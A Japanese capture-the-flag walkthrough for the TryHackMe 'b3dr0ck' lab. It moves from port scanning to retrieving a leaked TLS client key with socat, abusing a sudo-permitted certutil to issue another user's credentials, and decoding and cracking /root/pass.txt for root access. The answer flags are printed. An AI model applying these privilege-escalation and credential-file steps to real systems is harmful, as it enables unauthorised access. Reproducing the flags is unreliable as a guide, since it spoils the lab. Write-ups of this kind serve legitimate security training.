概要
TryHackMe「b3dr0ck」のWalkthroughです。
Task1
Q1.What is the barney.txt flag?
Hint.Explore the higher ports, one is ready for a TLS socket with key & cert obtained from port 9009
ポートスキャンを実行します。
$ nmap -Pn -sC -sV -A -T4 -p- 10.10.192.220 -oN nmap_result
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 1a:c7:00:71:b6:65:f5:82:d8:24:80:72:48:ad:99:6e (RSA)
| 256 3a:b5:25:2e:ea:2b:44:58:24:55:ef:82:ce:e0:ba:eb (ECDSA)
|_ 256 cf:10:02:8e:96:d3:24:ad:ae:7d:d1:5a:0d:c4:86:ac (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://10.10.192.220:4040/
|_http-server-header: nginx/1.18.0 (Ubuntu)
4040/tcp open ssl/yo-main?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2024-07-28T12:41:38
|_Not valid after: 2025-07-28T12:41:38
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Date: Sun, 28 Jul 2024 13:05:29 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <title>ABC</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to ABC!</h1>
| <p>Abbadabba Broadcasting Compandy</p>
| <p>We're in the process of building a website! Can you believe this technology exists in bedrock?!?</p>
| <p>Barney is helping to setup the server, and he said this info was important...</p>
| <pre>
| Hey, it's Barney. I only figured out nginx so far, what the h3ll is a database?!?
| Bamm Bamm tried to setup a sql database, but I don't see it running.
| Looks like it started something else, but I'm not sure how to turn it off...
| said it was from the toilet and OVER 9000!
| Need to try and secure
| HTTPOptions:
| HTTP/1.1 200 OK
| Content-type: text/html
| Date: Sun, 28 Jul 2024 13:05:30 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <title>ABC</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to ABC!</h1>
| <p>Abbadabba Broadcasting Compandy</p>
| <p>We're in the process of building a website! Can you believe this technology exists in bedrock?!?</p>
| <p>Barney is helping to setup the server, and he said this info was important...</p>
| <pre>
| Hey, it's Barney. I only figured out nginx so far, what the h3ll is a database?!?
| Bamm Bamm tried to setup a sql database, but I don't see it running.
| Looks like it started something else, but I'm not sure how to turn it off...
| said it was from the toilet and OVER 9000!
|_ Need to try and secure
| tls-alpn:
|_ http/1.1
9009/tcp open pichat?
| fingerprint-strings:
| NULL:
| ____ _____
| \x20\x20 / / | | | | /\x20 | _ \x20/ ____|
| \x20\x20 /\x20 / /__| | ___ ___ _ __ ___ ___ | |_ ___ / \x20 | |_) | |
| \x20/ / / _ \x20|/ __/ _ \| '_ ` _ \x20/ _ \x20| __/ _ \x20 / /\x20\x20| _ <| |
| \x20 /\x20 / __/ | (_| (_) | | | | | | __/ | || (_) | / ____ \| |_) | |____
| ___|_|______/|_| |_| |_|___| _____/ /_/ _____/ _____|
|_ What are you looking for?
54321/tcp open ssl/unknown
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2024-07-28T12:41:38
|_Not valid after: 2025-07-28T12:41:38
| fingerprint-strings:
| DNSStatusRequestTCP, Kerberos, LDAPSearchReq, RPCCheck, SIPOptions, SMBProgNeg, TLSSessionReq, oracle-tns:
|_ Error: 'undefined' is not authorized for access.
ポートの稼働状況が分かりました。
| ポート | サービス | バージョン |
|---|---|---|
| 22 | ssh | OpenSSH 8.2p1 |
| 80 | http | nginx 1.18.0 |
| 4040 | http | ssl/yo-main? |
| 9009 | pichat? | |
| 54321 | ssl/unknown |
80番ポートにアクセスすると4040ポートにリダイレクトされました。
9009ポートにアクセスすると、54321ポートにアクセスするコマンドのヒントが記載されていました。
socatコマンドで9009ポートにアクセスすると、証明書と秘密鍵を得られました。
$ socat TCP:10.10.192.220:9009 -
You use this service to recover your client certificate and private key
What are you looking for? key
Sounds like you forgot your private key. Let's find it for you...
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAt+MLXHtQiHrbW3n4wcbG3u2lzZwrQtAklkFEHwL905bzFxXh
Y/dWM9R6J6aTVIi5TzP0TJhZqVQKxPY7JIsv1WcZGD1sXe8pNW4oxIHs+pUHCg2E
(省略)
5RzOMrMSKJq4ybQgMNA+Nf1D2vw/cnQlCwFBSjUNhw1tyTvvSp+55g==
-----END RSA PRIVATE KEY-----
What are you looking for? certi
Sounds like you forgot your certificate. Let's find it for you...
-----BEGIN CERTIFICATE-----
MIICoTCCAYkCAgTSMA0GCSqGSIb3DQEBCwUAMBQxEjAQBgNVBAMMCWxvY2FsaG9z
dDAeFw0yNDA3MjgxMjQyMjVaFw0yNTA3MjgxMjQyMjVaMBgxFjAUBgNVBAMMDUJh
(省略)
myPbWzYDXFUvN5EnSfgNlkm7eGa/5QXKr6dvX7ns/4UfUMeR+37hlazPgJu7vVoC
cDeqE1s=
-----END CERTIFICATE-----
得られた証明書と秘密鍵で54321ポートにアクセスします。
$ socat stdio ssl:10.10.192.220:54321,cert=certificate.crt,key=private_key,verify=0
2024/07/28 09:31:52 socat[27463] W refusing to set empty SNI host name
__ __ _ _ _____ _ _ _____ _
\ \ / / | | | | | __ \ | | | | | __ \ | |
\ \_/ /_ _| |__ | |__ __ _ | | | | __ _| |__ | |__ __ _ | | | | ___ | |
\ / _` | '_ \| '_ \ / _` | | | | |/ _` | '_ \| '_ \ / _` | | | | |/ _ \| |
| | (_| | |_) | |_) | (_| | | |__| | (_| | |_) | |_) | (_| | | |__| | (_) |_|
|_|\__,_|_.__/|_.__/ \__,_| |_____/ \__,_|_.__/|_.__/ \__,_| |_____/ \___/(_)
Welcome: 'Barney Rubble' is authorized.
b3dr0ck>
サーバーからSSHの認証情報らしきものを得られました。
b3dr0ck> ls
Unrecognized command: 'ls'
This service is for login and password hints
b3dr0ck> password
Password hint: d1ad7c0a3805955a35eb260dab4180dd (user = 'Barney Rubble')
Username: barney,Password: d1ad7c0a3805955a35eb260dab4180ddでSSH接続に成功しました。
$ ssh barney@10.10.192.220
barney@b3dr0ck:~$
/home/barney/barney.txtからフラグを入手できま
/home/barney/barney.txt
THM{f05780f08f0eb1de65023069d0e4c90c}
A.THM{f05780f08f0eb1de65023069d0e4c90c}
Q2.What is fred's password?
Hint.You can find it same way as barney's, with fred's credentials (cert + key)
sudo -lで確認すると/usr/bin/certutilを発見しました。
$ sudo -l
[sudo] password for barney:
Matching Defaults entries for barney on b3dr0ck:
insults, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User barney may run the following commands on b3dr0ck:
(ALL : ALL) /usr/bin/certutil
/usr/bin/certutilコマンドで証明書などを発見しました。
/usr/share/abc/certs配下にファイルがあります。
$ sudo /usr/bin/certutil ls
Current Cert List: (/usr/share/abc/certs)
------------------
total 56
drwxrwxr-x 2 root root 4096 Apr 30 2022 .
drwxrwxr-x 8 root root 4096 Apr 29 2022 ..
-rw-r----- 1 root root 972 Jul 28 12:42 barney.certificate.pem
-rw-r----- 1 root root 1678 Jul 28 12:42 barney.clientKey.pem
-rw-r----- 1 root root 894 Jul 28 12:42 barney.csr.pem
-rw-r----- 1 root root 1678 Jul 28 12:42 barney.serviceKey.pem
-rw-r----- 1 root root 976 Jul 28 12:42 fred.certificate.pem
-rw-r----- 1 root root 1674 Jul 28 12:42 fred.clientKey.pem
-rw-r----- 1 root root 898 Jul 28 12:42 fred.csr.pem
-rw-r----- 1 root root 1678 Jul 28 12:42 fred.serviceKey.pem
-aオプションを使用してfredアカウントの証明書と秘密鍵を得られました。
$ sudo /usr/bin/certutil -a fred.csr.pem
Generating credentials for user: a (fredcsrpem)
Generated: clientKey for a: /usr/share/abc/certs/a.clientKey.pem
Generated: certificate for a: /usr/share/abc/certs/a.certificate.pem
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAxIzi//1luz5rRhD575qiDaogyk7uffWHITr/JzjJjIsNWRfW
ueHJw/dtekCNlBepqUwmbvpIYXLCiA2DyLFZC5DwQfKjASPo65fxKl7pGCqygOW
(省略)
QaYG1I7TKfs7zHBtULvNEkewlklu1to98LxATzrctCWy7Gt7C67qFw==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIICnjCCAYYCAjA5MA0GCSqGSIb3DQEBCwUAMBQxEjAQBgNVBAMMCWxvY2FsaG9z
dDAeFw0yNDA3MjgxMzUwMTJaFw0yNDA3MjkxMzUwMTJaMBUxEzARBgNVBAMMCmZy
(省略)
90gUYUuv4wntOwqGbMxJS2eg/zBKAxXDxIgcZVJKPjm6/aXftYbunGozL2GYhikB
6u0=
-----END CERTIFICATE-----
Q1と同様にsocatコマンドで、fredの証明書と秘密鍵を使用してサーバーにアクセスします。
$ socat stdio ssl:10.10.192.220:54321,cert=fred_cert.csr,key=fred_priv_key,verify=0
2024/07/28 09:54:18 socat[38652] W refusing to set empty SNI host name
__ __ _ _ _____ _ _ _____ _
\ \ / / | | | | | __ \ | | | | | __ \ | |
\ \_/ /_ _| |__ | |__ __ _ | | | | __ _| |__ | |__ __ _ | | | | ___ | |
\ / _` | '_ \| '_ \ / _` | | | | |/ _` | '_ \| '_ \ / _` | | | | |/ _ \| |
| | (_| | |_) | |_) | (_| | | |__| | (_| | |_) | |_) | (_| | | |__| | (_) |_|
|_|\__,_|_.__/|_.__/ \__,_| |_____/ \__,_|_.__/|_.__/ \__,_| |_____/ \___/(_)
Welcome: 'fredcsrpem' is authorized.
b3dr0ck>
fredのパスワードを得られました
b3dr0ck> password
Password hint: YabbaDabbaD0000! (user = 'fredcsrpem')
A.YabbaDabbaD0000!
Q3.What is the fred.txt flag?
fredにログインします。
$ su fred
Password:
fred@b3dr0ck:~$
/home/fred/fred.txtからフラグを入手できます。
/home/fred/fred.txt
THM{08da34e619da839b154521da7323559d}
A.THM{08da34e619da839b154521da7323559d}
Q4.What is the root.txt flag?
Hint.[root pass] Multi encode/decode (+ crackstation ;)
sudo -lで確認します。
$ sudo -l
Matching Defaults entries for fred on b3dr0ck:
insults, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User fred may run the following commands on b3dr0ck:
(ALL : ALL) NOPASSWD: /usr/bin/base32 /root/pass.txt
(ALL : ALL) NOPASSWD: /usr/bin/base64 /root/pass.txt
/root/pass.txtをデコードするとパスワードのハッシュ値を得られました。
$ sudo /usr/bin/base64 /root/pass.txt | base64 -d | base32 -d | base64 -d
a00a12aad6b7c16bf07032bd05a31d56
下記サイトで、得られたハッシュ値を解析してパスワードを特定しました。
rootでログインし、/root/root.txtからフラグを入手できます。
Password:
root@b3dr0ck:/home/fred#
/root/root.txt
THM{de4043c009214b56279982bf10a661b7}
A.THM{de4043c009214b56279982bf10a661b7}